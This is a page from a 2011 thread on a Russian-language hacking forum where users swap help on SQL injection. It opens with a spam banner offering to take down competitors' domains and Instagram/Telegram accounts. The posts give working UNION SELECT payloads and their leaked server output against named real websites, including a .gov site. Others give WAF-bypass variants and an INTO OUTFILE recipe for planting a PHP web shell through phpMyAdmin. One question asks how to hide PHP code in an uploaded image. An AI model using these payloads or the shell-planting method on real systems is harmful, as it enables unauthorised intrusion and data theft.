УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1881 из 2438

1881

Опции темы

Поиск в этой теме

Опции просмотра

#18801

08.12.2011, 18:02

vasykas

Guest

Сообщений: n/a

Провел на форуме:
173402

Репутация: 37

Цитата:

Сообщение от stan0009

stan0009 said:
Всем привет!)
товарищи, которые работают с sql injections.
посоветуйте прогу или лучше скажите какой вы пользуетесь для их поиска а то моя уже вымерла походу(

Дорк и далее

MySQLi мне оч помогает

ссыль не даю ( в л.с)

#18802

08.12.2011, 19:15

zenon3

Guest

Сообщений: n/a

Провел на форуме:
771

Репутация: 0

Помогите разобраться

http://www.cideko.com/pro_con.php?id=3 - group by работает но union select - ошибка

и

http://www.greenbergresearch.com/index.php?ID=1 тоже самое

никак не могу обойти фильтрацию

#18803

08.12.2011, 19:45

Ereee

Guest

Сообщений: n/a

Провел на форуме:
102354

Репутация: 267

Цитата:

Сообщение от zenon3

zenon3 said:
Помогите разобраться
http://www.cideko.com/pro_con.php?id=3 - group by работает но union select - ошибка
и
http://www.greenbergresearch.com/index.php?ID=1 тоже самое
никак не могу обойти фильтрацию

Код:

Code:
http://www.greenbergresearch.com/index.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,unhex(hex(database())),14--+f

Warning: main(/var/www/html/inc/templates/greenbergdevDB): failed to open stream: No such file or directory in /var/www/html/index.php on line 195

http://www.greenbergresearch.com/index.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,unhex(hex(user())),14--+f

Warning: main(/var/www/html/inc/templates/greenbergUser@localhost): failed to open stream: No such file or directory in /var/www/html/index.php on line 195

#18804

08.12.2011, 20:15

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

Отправить сообщение для Konqi с помощью ICQ

zenon3

Цитата:

Сообщение от None

http://www.cideko.com/pro_con.php?id=3 - group by работает но union select - ошибка

тут мускул 3, поэтому ругается на обединение запросов

#18805

08.12.2011, 21:16

Skofield

Участник форума

Регистрация: 27.08.2008

Сообщений: 209

Провел на форуме:
1759582

Репутация: 394

Цитата:

Сообщение от sl1k

sl1k said:
есть доступ к phpmyadmin на сервере, как можно залить шелл ?

Код:

Code:
CREATE TABLE `test_shell` (`shl` TEXT NOT NULL) TYPE = MYISAM ; INSERT INTO `test_shell` ( `shl` ) VALUES (`пхп-код`); SELECT `shl` FROM `test_shell` INTO OUTFILE `путь/имяфайла.php` DROP TABLE `test_shell`

#18806

08.12.2011, 23:22

SergioBlog

Guest

Сообщений: n/a

Провел на форуме:
3807

Репутация: 0

Реально ли залить картинку с пхп кодом внутри и сохранить этот код после обработки?

В начале файла добавляется: CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 90

ну и пхп код сносит само собой

#18807

09.12.2011, 02:35

lightangel

Guest

Сообщений: n/a

Провел на форуме:
35174

Репутация: -6

help

I have a WAF problem..

Код:

Code:
http://www.iccs.edu/news_details.php?id=-5%27+un/**/ion+se/**/lect+1,2,3,4,5+--+

Код:

Code:
http://www.iccs.edu/news_details.php?id=-5%27+UNunionION+SEselectLECT+1,2,3,4,5+--+

But can't find vulnerable number!

Any help?

#18808

09.12.2011, 02:40

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

Цитата:

Сообщение от lightangel

lightangel said:
I have a WAF problem..

Код:

Code:
http://www.iccs.edu/news_details.php?id=-5%27+un/**/ion+se/**/lect+1,2,3,4,5+--+

Код:

Code:
http://www.iccs.edu/news_details.php?id=-5%27+UNunionION+SEselectLECT+1,2,3,4,5+--+

But can't find vulnerable number!
Any help?

http://www.iccs.edu/news_details.php?id=5+and+0+/*!UnIoN+SeLeCt*/+1,2,3,4,5--+

lightangel

try to understand a principle of injection

no need to add a quote after vuln Parameter, if injection type is INTEGER, you'll just break the syntax

#18809

09.12.2011, 02:44

lightangel

Guest

Сообщений: n/a

Провел на форуме:
35174

Репутация: -6

Thanks. Is this site vulnerable?

Код:

Code:
http://www.vidol.gov/dol_news.php?page=-3'

And I did everything showing it's injectable.

Problem is, I tried error based, only brings this error.

Код:

Code:
http://www.vidol.gov/dol_news.php?errmsg=You+have+specified+an+invalid+page+number.

Any help?

#18810

09.12.2011, 02:45

A_n_d_r_e_i

Участник форума

Регистрация: 02.09.2009

Сообщений: 286

Провел на форуме:
3426765

Репутация: 257

Отправить сообщение для A_n_d_r_e_i с помощью ICQ

lightangel, read this article:

/thread104591.html

(about sql inj)

and this: /threadnav43966-1-10.html

Страница 1881 из 2438

1881

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход